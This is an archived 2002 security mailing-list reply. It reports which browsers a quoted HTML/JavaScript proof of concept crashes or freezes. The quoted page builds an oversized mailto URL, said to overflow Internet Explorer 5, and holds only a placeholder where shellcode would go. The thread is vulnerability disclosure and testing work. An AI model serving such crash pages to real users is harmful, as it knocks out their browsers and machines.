Vulnerability Development mailing list archives
Re: Buffer Overflow with all versions of Internet Explorer and Javacript.
From: Scott Mackenzie <smackenz () sdf lonestar org>
Date: 03 Jun 2002 00:47:52 +0100
After a few minutes testing it seems this does not only effect Internet Explorer but also the following browsers: In KDE's konqueror Latest Version it Seg Faults the browser instantly In Mozilla 0.99 it causes a Denial of Service situation against the machine with 100% CPU usage, and some crazy hard drive accessing until the process is killed Other information: Netscape 6 series latest version does nothing when SMASH! is clicked Galeon latest tries to mail a rather long email address, but the browser itself is un-effected Test System: Linux Redhat 7.3 2.4.18-4 #1 Thu May 2 18:06:25 EDT 2002 i686 --------------------------------- Scott Mackenzie Cybernetics & Virtual Worlds (2) Bradford University http://smackenz.zapto.org --------------------------------- On Sun, 2002-06-02 at 22:08, Matias Sedalo wrote:
the 28/07/1999 I have discovered a stack buffer overflow caused by until
the moment all the versions of the Internet Explorer.
In many windows98 causes the necessity to reinitiate the equipment, since
to my to seem it remains without memory.
Only it has been proven in several versions 5 of IE on WindowsNT
server sp6 and windows98 Second Edition. As I said before the Windows 98
I had to reinitiate it to the force.
Can be possible to execute arbitrary code using the variable company of
the example?
// internet Explorer 5.00.2314.1003 on WindowsNT 4 sp6
// internet Explorer 5.00.3500.1003 on Windows98se
-----------cut here---------------------------
<html><head></head>
<script language="JAVASCRIPT">
function hacerMail() {
var company;
crear();
address="s0t4ipv6 () shellcode com ar";
soporte();
}
function soporte(){
var soporte="bill () mocosoft com";
window.location="mailto:"+address+"?cc="+soporte+"&subject="+company;
// window.location=company; // also this line cause the bof.
close(hacerMail());
}
function crear(){
company="shellcode here?\n"; // i don't think so.
}
</script>
<input type="button" onClick="hacerMail();" value="SMASH!"></input>
</html>
-----------cut here---------------------------
Regards.
- Internet es perjudicial para la salud -
- Ley N~ 127.0.0.1
Matias Sedalo
http://www.shellcode.com.ar
s0t4ipv6 () shellcode com ar
B7A1 B45E 4906 34BD 70A1 55F8 E5A0 BCA2
.......................................
Current thread:
- Buffer Overflow with all versions of Internet Explorer and Javacript. Matias Sedalo (Jun 02)
- Re: Buffer Overflow with all versions of Internet Explorer and Javacript. Scott Mackenzie (Jun 02)
- Re: Buffer Overflow with all versions of Internet Explorer and Javacript. Jacek Lach (Jun 03)
- Re: Buffer Overflow with all versions of Internet Explorer and Javacript. George Staikos (Jun 03)
- Re: Buffer Overflow with all versions of Internet Explorer and Javacript. Nicolas Sigal (Jun 03)
- Re: Buffer Overflow with all versions of Internet Explorer and Javacript. Jacek Lach (Jun 03)
- Re: Buffer Overflow with all versions of Internet Explorer and Javacript. Scott Mackenzie (Jun 02)
- Re: Buffer Overflow with all versions of Internet Explorer and Javacript. Gian Fabio Palmerini (Jun 03)